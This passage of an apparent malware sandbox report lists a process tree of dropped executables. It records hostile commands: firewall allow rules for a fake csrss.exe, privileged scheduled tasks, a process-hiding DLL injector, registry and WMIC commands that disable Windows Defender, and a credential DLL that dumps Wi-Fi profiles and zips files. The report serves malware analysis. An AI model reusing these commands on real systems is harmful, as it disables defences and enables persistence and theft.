        C:\Users\Admin\Pictures\S1RqBEWJrAFynQ3ALpu1u1UT.exe
        
        "C:\Users\Admin\Pictures\S1RqBEWJrAFynQ3ALpu1u1UT.exe"
        7⤵
        Executes dropped EXE
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\ulk.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ulk.0.exe"
        8⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 2432
        9⤵
        Program crash
        
        PID:800
        
        C:\Users\Admin\AppData\Local\Temp\ulk.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ulk.1.exe"
        8⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 1456
        8⤵
        Program crash
        
        PID:5536
        
        C:\Users\Admin\Pictures\mqSv1xI7xXqVmGkwozUFdfvN.exe
        
        "C:\Users\Admin\Pictures\mqSv1xI7xXqVmGkwozUFdfvN.exe"
        7⤵
        Executes dropped EXE
        
        PID:3612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4912
        
        C:\Users\Admin\Pictures\mqSv1xI7xXqVmGkwozUFdfvN.exe
        
        "C:\Users\Admin\Pictures\mqSv1xI7xXqVmGkwozUFdfvN.exe"
        8⤵
        
        PID:5788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:4524
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:1240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5848
        
        C:\Users\Admin\Pictures\QlQEvziFMMGDiMl1m7FF3gPC.exe
        
        "C:\Users\Admin\Pictures\QlQEvziFMMGDiMl1m7FF3gPC.exe"
        7⤵
        Executes dropped EXE
        
        PID:4348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2076
        
        C:\Users\Admin\Pictures\QlQEvziFMMGDiMl1m7FF3gPC.exe
        
        "C:\Users\Admin\Pictures\QlQEvziFMMGDiMl1m7FF3gPC.exe"
        8⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:4668
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:6072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1660
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4112
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:3888
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5880
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:1100
        
        C:\Users\Admin\Pictures\l9jDp8WITIcW8BKp7KtW90LN.exe
        
        "C:\Users\Admin\Pictures\l9jDp8WITIcW8BKp7KtW90LN.exe"
        7⤵
        Executes dropped EXE
        
        PID:4428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5008
        
        C:\Users\Admin\Pictures\l9jDp8WITIcW8BKp7KtW90LN.exe
        
        "C:\Users\Admin\Pictures\l9jDp8WITIcW8BKp7KtW90LN.exe"
        8⤵
        
        PID:5872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:4912
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:248
        
        C:\Users\Admin\Pictures\GVeSoaWSVE79kYgk3qrksfku.exe
        
        "C:\Users\Admin\Pictures\GVeSoaWSVE79kYgk3qrksfku.exe"
        7⤵
        Executes dropped EXE
        
        PID:3668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1920
        
        C:\Users\Admin\Pictures\GVeSoaWSVE79kYgk3qrksfku.exe
        
        "C:\Users\Admin\Pictures\GVeSoaWSVE79kYgk3qrksfku.exe"
        8⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:960
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5992
        
        C:\Users\Admin\Pictures\kUl0R0jzs4DdHnoSSaop8lGS.exe
        
        "C:\Users\Admin\Pictures\kUl0R0jzs4DdHnoSSaop8lGS.exe"
        7⤵
        
        PID:6064
        
        C:\Users\Admin\Pictures\HtfQztpMoPFKz6EkkUYP5YOY.exe
        
        "C:\Users\Admin\Pictures\HtfQztpMoPFKz6EkkUYP5YOY.exe"
        7⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\7zS11F8.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:568
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:5812
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:664
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:5856
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:5984
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4556
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4488
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS11F8.tmp\Install.exe\" it /LDxdidlPpp 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:4112
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:1272
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:1996
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:2128
        
        C:\Users\Admin\Pictures\K2njJxr9INn3CjDA9FM1H1FC.exe
        
        "C:\Users\Admin\Pictures\K2njJxr9INn3CjDA9FM1H1FC.exe"
        7⤵
        
        PID:1260
        
        C:\Users\Admin\AppData\Local\Temp\7zS330C.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:5504
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:1004
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1624
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:4544
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:5616
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3080
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4900
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:464
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS330C.tmp\Install.exe\" it /sdZdidMVcr 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3608
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:1368
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:4660
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2004
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3216
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2876
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:3680
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4456
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\062789476783_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4044
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        
        PID:6124
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2280
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5200
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4900
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:5652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 400
        6⤵
        Program crash
        
        PID:5412
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        
        PID:2552
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        
        PID:2820
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:1356
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:1996
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        
        PID:5400
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        
        PID:5036
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        
        PID:2088
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:432
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:5188
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:5884
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        
        PID:4284
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        
        PID:492
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        
        PID:5920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:3160
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        
        PID:1572
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
